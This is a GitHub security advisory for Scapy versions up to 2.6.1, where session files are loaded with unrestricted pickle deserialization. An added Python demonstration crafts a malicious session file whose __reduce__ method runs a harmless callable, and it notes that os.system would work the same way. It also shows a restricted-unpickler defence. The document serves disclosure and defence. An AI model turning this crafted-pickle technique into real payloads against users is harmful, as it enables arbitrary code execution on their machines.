{"id":"GHSA-cq46-m9x9-j8w2","summary":"Scapy Session Loading Vulnerable to Arbitrary Code Execution via Untrusted Pickle Deserialization","details":"### Summary\n\nAn unsafe deserialization vulnerability in Scapy \u003cv2.7.0 allows attackers to execute arbitrary code **when a malicious session file is locally loaded via the `-s` option**. This requires convincing a user to manually load a malicious session file.\n\n---\n\n### Details\n\nScapy’s interactive shell supports session loading using gzip-compressed pickle files:\n\n```bash\n./run_scapy -s \u003csession_file.pkl.gz\u003e\n```\n\nInternally, this triggers:\n\n```python\n# main.py\nSESSION = pickle.load(gzip.open(session_name, \"rb\"))\n```\n\nSince `pickle.load()` is called with no restriction on which globals the pickle stream may reference, **any callable an attacker embeds via `__reduce__()` is invoked during unpickling, before a session object is even returned**. This makes it trivial for an attacker to drop a malicious `.pkl.gz` in a shared folder and have it executed by unsuspecting users.\n\nThe vulnerability exists in the `load_session` function, which deserializes data using `pickle.load()` on `.pkl.gz` files provided via the `-s` CLI flag or programmatically through `conf.session`.\n\n**Affected lines in source code**:\nhttps://github.com/secdev/scapy/blob/master/scapy/main.py#L569-L572\n\n```python\ntry:\n    s = pickle.load(gzip.open(fname, \"rb\"))\nexcept IOError:\n    try:\n        s = pickle.load(open(fname, \"rb\"))\n```\n\nNote the `IOError` fallback: if the file is not a valid gzip stream, the same unrestricted `pickle.load()` is run on the raw file, so an uncompressed pickle is accepted as well and the `.pkl.gz` extension is not actually required.\n\n### Impact\n\nThis is a classic insecure deserialization vulnerability: code execution happens as soon as the untrusted data is deserialized, with the privileges of the user running Scapy.\n\nAny user who can trick another user into loading a crafted `.pkl.gz` session file (e.g. via the `-s` option) can execute arbitrary Python code.\n\n- **Vulnerability type:** Insecure deserialization (Python `pickle`)\n- **CWE**: [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n- **CVSS v4.0 Vector**: `CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N`\n- **CVSS Score**: 5.4 (Medium)\n- **Impact:** Arbitrary Code Execution\n- **Attack vector:** Local or supply chain (malicious `.pkl.gz`)\n- **Affected users:** Any user who loads session files (even interactively)\n- **Affected versions:** **Scapy v2.6.1 and all earlier releases** (fixed in v2.7.0)\n\n---\n\n### Mitigations\n\n- Do not use 'sessions' (the `-s` option when launching Scapy).\n- Upgrade to Scapy 2.7.0 or later, where the session mechanism has been removed.","modified":"2025-10-23T20:17:37.620579Z","published":"2025-10-22T16:45:49Z","database_specific":{"cwe_ids":["CWE-502"],"github_reviewed_at":"2025-10-22T16:45:49Z","nvd_published_at":null,"severity":"MODERATE","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/secdev/scapy/security/advisories/GHSA-cq46-m9x9-j8w2"},{"type":"WEB","url":"https://github.com/secdev/scapy/commit/13621d1145b3435e9d03caf20997107a84435c0b"},{"type":"PACKAGE","url":"https://github.com/secdev/scapy"}],"affected":[{"package":{"name":"scapy","ecosystem":"PyPI","purl":"pkg:pypi/scapy"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"last_affected":"2.6.1"}]}],"versions":["2.2.0-dev","2.3.1","2.3.2","2.3.3","2.4.0","2.4.0rc3","2.4.0rc4","2.4.0rc5","2.4.1","2.4.2","2.4.3","2.4.3rc1","2.4.3rc2","2.4.3rc3","2.4.3rc4","2.4.4","2.4.4rc1","2.4.4rc2","2.4.5","2.4.5rc1","2.4rc2","2.5.0","2.5.0rc1","2.5.0rc2","2.5.0rc3","2.6.0","2.6.0rc1","2.6.0rc2","2.6.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-cq46-m9x9-j8w2/GHSA-cq46-m9x9-j8w2.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"}]}
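Added example, not part of the advisory and not Scapy's own code: the script below demonstrates the mechanism described under Details and Impact. `load_session_unsafe` reproduces the affected `load_session` logic (unrestricted `pickle.load()`, gzip first, raw file as fallback); `MaliciousSession` is a constructed session object whose `__reduce__()` points at `builtins.open`, so the only side effect of loading it is an empty marker file (a real payload would reference `os.system` or similar, the mechanism is identical); `RestrictedUnpickler` shows the standard-library pattern of overriding `Unpickler.find_class()` with an allow-list so that the same file is refused. Everything is written to a temporary directory; the file names, the allow-list contents and the sample session data are assumptions made for this example.

```python
"""Added illustration for GHSA-cq46-m9x9-j8w2 (example code, not Scapy's).

(1) An unrestricted pickle.load() on a session file runs whatever callable the
    file references via __reduce__.
(2) An Unpickler whose find_class() only resolves an allow-list refuses it.
The payload is constructed and harmless: it only creates an empty marker file.
"""
import gzip
import io
import os
import pickle
import tempfile


class MaliciousSession:
    """Pickles as "call builtins.open(marker_path, 'w')" instead of its own state.

    An attacker would reference os.system or subprocess.Popen here instead;
    only the callable differs, the pickle opcodes are the same.
    """

    def __init__(self, marker_path):
        self.marker_path = marker_path

    def __reduce__(self):
        return (open, (self.marker_path, "w"))


def craft_session_file(path, marker_path):
    """Write the gzip-compressed pickle that Scapy's -s option expects."""
    with gzip.open(path, "wb") as fh:
        pickle.dump(MaliciousSession(marker_path), fh)


def load_session_unsafe(fname):
    """Same logic as the affected load_session(): unrestricted pickle.load,
    falling back to a plain (uncompressed) pickle when gzip fails."""
    try:
        with gzip.open(fname, "rb") as fh:
            return pickle.load(fh)  # the embedded callable runs inside this call
    except OSError:  # IOError is an alias of OSError on Python 3
        with open(fname, "rb") as fh:
            return pickle.load(fh)


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only an allow-list of harmless builtins; refuse every other global.

    Plain containers and scalars (dict, list, str, bytes, int, ...) are encoded
    with dedicated opcodes and never reach find_class, so the list stays small.
    (Allow-list contents are an assumption for this example.)
    """

    ALLOWED = {"builtins": {"set", "frozenset", "range", "slice", "complex"}}

    def find_class(self, module, name):
        if name in self.ALLOWED.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"refusing to resolve global {module}.{name} from session file")


def load_session_restricted(fname):
    """Hardened loader: same file handling, but every GLOBAL/STACK_GLOBAL
    opcode in the stream goes through RestrictedUnpickler.find_class()."""
    try:
        with gzip.open(fname, "rb") as fh:
            data = fh.read()
    except OSError:
        with open(fname, "rb") as fh:
            data = fh.read()
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo_malicious():
    """Return (payload_ran_unrestricted, restricted_refused, payload_ran_restricted)."""
    with tempfile.TemporaryDirectory() as tmp:
        session = os.path.join(tmp, "session.pkl.gz")
        marker = os.path.join(tmp, "payload_ran")
        craft_session_file(session, marker)

        result = load_session_unsafe(session)  # "session" is really the file handle open() returned
        ran_unrestricted = os.path.exists(marker)
        result.close()
        os.remove(marker)

        refused = False
        try:
            load_session_restricted(session)
        except pickle.UnpicklingError:
            refused = True
        ran_restricted = os.path.exists(marker)
    return ran_unrestricted, refused, ran_restricted


def demo_benign():
    """A session holding only plain data passes the restricted loader unchanged."""
    session_data = {"iface": "eth0", "pkt_count": 3, "raw": b"\x00\x01"}  # constructed sample
    with tempfile.TemporaryDirectory() as tmp:
        session = os.path.join(tmp, "session.pkl.gz")
        with gzip.open(session, "wb") as fh:
            pickle.dump(session_data, fh, protocol=4)
        return load_session_restricted(session)


if __name__ == "__main__":
    print("malicious session:", demo_malicious())  # (True, True, False)
    print("benign session:   ", demo_benign())
```

Run as a script, the malicious case prints `(True, True, False)`: the marker file appeared under the unrestricted loader, the restricted loader raised `UnpicklingError` at the `_io.open` global, and nothing ran on that second attempt. The limitation is worth stating: a real Scapy session contains Scapy packet objects, which an allow-list this narrow would reject too, so `find_class` filtering is at best a partial defence for this feature; the advisory's mitigation is to stop using session files and move to 2.7.0, where the mechanism no longer exists.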